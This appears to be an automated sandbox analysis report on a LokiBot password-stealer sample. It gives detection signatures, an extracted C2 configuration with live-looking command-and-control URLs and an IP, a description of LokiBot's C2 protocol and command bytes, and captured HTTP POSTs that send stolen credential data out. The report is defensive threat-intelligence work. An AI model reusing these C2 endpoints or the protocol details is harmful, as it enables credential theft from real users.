Edit tour

Windows Analysis Report
XZoxEqlRUw.exe

Overview

General Information

Sample name:	XZoxEqlRUw.exe renamed because original name is a hash value
Original sample name:	06E4CE3AA8AE08067B686BA000255529.exe
Analysis ID:	1417280
MD5:	06e4ce3aa8ae08067b686ba000255529
SHA1:	21369f523a74aedde8612c9dbf6d5b9df6557a51
SHA256:	c84552f0ddf17223045ee2c4e5aa5a4b59eea802f9d1548b0ff7e5cee3d14186
Tags:	exeLoki
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Generic Dropper

Yara detected Lokibot

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Yara detected aPLib compressed binary

Checks if the current process is being debugged

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

XZoxEqlRUw.exe (PID: 7604 cmdline: "C:\Users\user\Desktop\XZoxEqlRUw.exe" MD5: 06E4CE3AA8AE08067B686BA000255529)

XZoxEqlRUw.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\XZoxEqlRUw.exe" MD5: 06E4CE3AA8AE08067B686BA000255529)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "\u0097\u008b\u008b\u008f\u00c5\u00d0\u00d0\u00cc\u00ce\u00d1\u00cd\u00cd\u00cf\u00d1\u00ce\u00d1\u00ce\u00c6\u00cb\u00d0\u0081\u0085\u009e\u009b\u0092\u0096\u0091\u00d0\u008f\u008b\u008d\u00ca\u00d0\u0092\u0090\u0091\u0090\u00d1\u008f\u0097\u008f"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x175b2:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x497d:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x131c1:$des3: 68 03 66 00 00 0x175b2:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1767e:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: XZoxEqlRUw.exe PID: 7604	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: XZoxEqlRUw.exe PID: 7604	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: XZoxEqlRUw.exe PID: 7604	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: XZoxEqlRUw.exe PID: 7604	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x2eae:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: XZoxEqlRUw.exe PID: 7628	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: XZoxEqlRUw.exe PID: 7628	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: XZoxEqlRUw.exe PID: 7628	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: XZoxEqlRUw.exe PID: 7628	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0xf6fd:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.XZoxEqlRUw.exe.4dd41c2.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.XZoxEqlRUw.exe.4dd41c2.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.XZoxEqlRUw.exe.4dd41c2.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.XZoxEqlRUw.exe.4dd41c2.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.XZoxEqlRUw.exe.4dd41c2.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.XZoxEqlRUw.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.XZoxEqlRUw.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.XZoxEqlRUw.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.XZoxEqlRUw.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.XZoxEqlRUw.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.XZoxEqlRUw.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.XZoxEqlRUw.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.XZoxEqlRUw.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.XZoxEqlRUw.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.XZoxEqlRUw.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
1.2.XZoxEqlRUw.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.XZoxEqlRUw.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.XZoxEqlRUw.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.XZoxEqlRUw.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
1.2.XZoxEqlRUw.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.XZoxEqlRUw.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Click to see the 24 entries

Snort Signatures

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 31.220.1.194

Timestamp:	03/28/24-20:56:53.651892
SID:	2025381
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 31.220.1.194

Timestamp:	03/28/24-20:56:55.077590
SID:	2024313
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 31.220.1.194

Timestamp:	03/28/24-20:56:55.077590
SID:	2021641
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 31.220.1.194

Timestamp:	03/28/24-20:56:57.374972
SID:	2024318
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 31.220.1.194

Timestamp:	03/28/24-20:56:57.374972
SID:	2024313
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 31.220.1.194

Timestamp:	03/28/24-20:56:57.374972
SID:	2021641
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 31.220.1.194

Timestamp:	03/28/24-20:56:52.327533
SID:	2025381
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 31.220.1.194

Timestamp:	03/28/24-20:56:55.077590
SID:	2024318
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.4 - Destination IP: 31.220.1.194

Timestamp:	03/28/24-20:56:53.651892
SID:	2024317
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 31.220.1.194

Timestamp:	03/28/24-20:56:53.651892
SID:	2021641
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 31.220.1.194

Timestamp:	03/28/24-20:56:57.374972
SID:	2025381
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.4 - Destination IP: 31.220.1.194

Timestamp:	03/28/24-20:56:52.327533
SID:	2024312
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 31.220.1.194

Timestamp:	03/28/24-20:56:52.327533
SID:	2021641
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.4 - Destination IP: 31.220.1.194

Timestamp:	03/28/24-20:56:55.077590
SID:	2025381
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.4 - Destination IP: 31.220.1.194

Timestamp:	03/28/24-20:56:53.651892
SID:	2024312
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.4 - Destination IP: 31.220.1.194

Timestamp:	03/28/24-20:56:52.327533
SID:	2024317
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: XZoxEqlRUw.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://kbfvzoboss.bid/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.top/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.trade/alien/fre.php	URL Reputation: Label: malware

Found malware configuration

Source: 1.2.XZoxEqlRUw.exe.400000.0.unpack

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "\u0097\u008b\u008b\u008f\u00c5\u00d0\u00d0\u00cc\u00ce\u00d1\u00cd\u00cd\u00cf\u00d1\u00ce\u00d1\u00ce\u00c6\u00cb\u00d0\u0081\u0085\u009e\u009b\u0092\u0096\u0091\u00d0\u008f\u008b\u008d\u00ca\u00d0\u0092\u0090\u0091\u0090\u00d1\u008f\u0097\u008f"]}

Multi AV Scanner detection for submitted file

Source: XZoxEqlRUw.exe

ReversingLabs: Detection: 95%

Machine Learning detection for sample

Source: XZoxEqlRUw.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Unpacked PE file: 1.2.XZoxEqlRUw.exe.400000.0.unpack

Source: XZoxEqlRUw.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

1_2_00403D74

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49730 -> 31.220.1.194:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49730 -> 31.220.1.194:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49730 -> 31.220.1.194:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49730 -> 31.220.1.194:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49731 -> 31.220.1.194:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49731 -> 31.220.1.194:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49731 -> 31.220.1.194:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49731 -> 31.220.1.194:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49732 -> 31.220.1.194:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49732 -> 31.220.1.194:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49732 -> 31.220.1.194:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49732 -> 31.220.1.194:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49733 -> 31.220.1.194:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49733 -> 31.220.1.194:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49733 -> 31.220.1.194:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49733 -> 31.220.1.194:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs:

Source: Joe Sandbox View

ASN Name: AMARUTU-TECHNOLOGYNL AMARUTU-TECHNOLOGYNL

Source: global traffic	HTTP traffic detected: POST /~zadmin/ptr5/mono.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 31.220.1.194Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0B63912Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /~zadmin/ptr5/mono.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 31.220.1.194Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0B63912Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /~zadmin/ptr5/mono.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 31.220.1.194Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0B63912Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /~zadmin/ptr5/mono.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 31.220.1.194Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0B63912Content-Length: 149Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
